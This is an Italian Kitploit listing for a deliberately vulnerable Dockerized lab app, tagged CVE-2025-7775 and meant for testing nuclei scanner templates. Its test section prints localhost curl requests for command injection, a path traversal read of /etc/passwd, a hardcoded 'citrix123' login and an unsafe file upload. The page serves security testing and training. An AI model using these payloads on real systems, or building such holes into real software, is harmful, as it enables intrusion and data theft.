Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-7775-vulnerable-lab — App web Dockerizzata vulnerabile che espone RCE, path traversal, credenziali hardcoded e upload di file non sicuri; un laboratorio isolato per testare i template degli scanner di sicurezza. | Kitploit
Strumenti/GitHubGitHub/aaqilyousuf/cve-2025-7775-vulnerable-lab
Scanner di VulnerabilitàSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubaaqilyousuf/cve-2025-7775-vulnerable-lab

CVE-2025-7775-vulnerable-lab

App web Dockerizzata vulnerabile che espone RCE, path traversal, credenziali hardcoded e upload di file non sicuri; un laboratorio isolato per testare i template degli scanner di sicurezza.

Vedi Repository
21 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-7775 Vulnerable Lab

Questo repository fornisce un ambiente vulnerabile per testare il template nuclei per CVE-2025-7775.

Esecuzione

root@kitploit:~
docker build -t vuln-app .
docker run -d --name vuln-test -p 5000:5000 vuln-app

Test di Vulnerabilità

1. Remote Command Execution (RCE)

root@kitploit:~
curl -X POST http://localhost:5000/api/v1/configuration \
  -H "Content-Type: application/json" \
  -d '{"payload":"ls > /tmp/poc_rce.txt"}'

docker exec -it vuln-test cat /tmp/poc_rce.txt

2. Path Traversal

root@kitploit:~
curl "http://localhost:5000/download?file=/etc/passwd"

3. Credenziali Hardcoded

root@kitploit:~
curl -X POST http://localhost:5000/api/v1/login \
  -H "Content-Type: application/json" \
  -d '{"username":"admin", "password":"citrix123"}'

4. Caricamento File Non Sicuro

root@kitploit:~
echo "POC FILE UPLOAD" > test.txt
curl -X POST -F "[email protected]" http://localhost:5000/upload
docker exec -it vuln-test cat /tmp/test.txt

Note d'Uso

  • Questo è un ambiente vulnerabile simulato, solo a scopo di test
  • Utilizzare solo in ambienti di laboratorio isolati
  • Non destinato all'uso in produzione
  • Solo per scopi educativi e di ricerca sulla sicurezza

Pulizia

root@kitploit:~
docker stop vuln-test
docker rm vuln-test
docker rmi vuln-app
Scarica lo strumento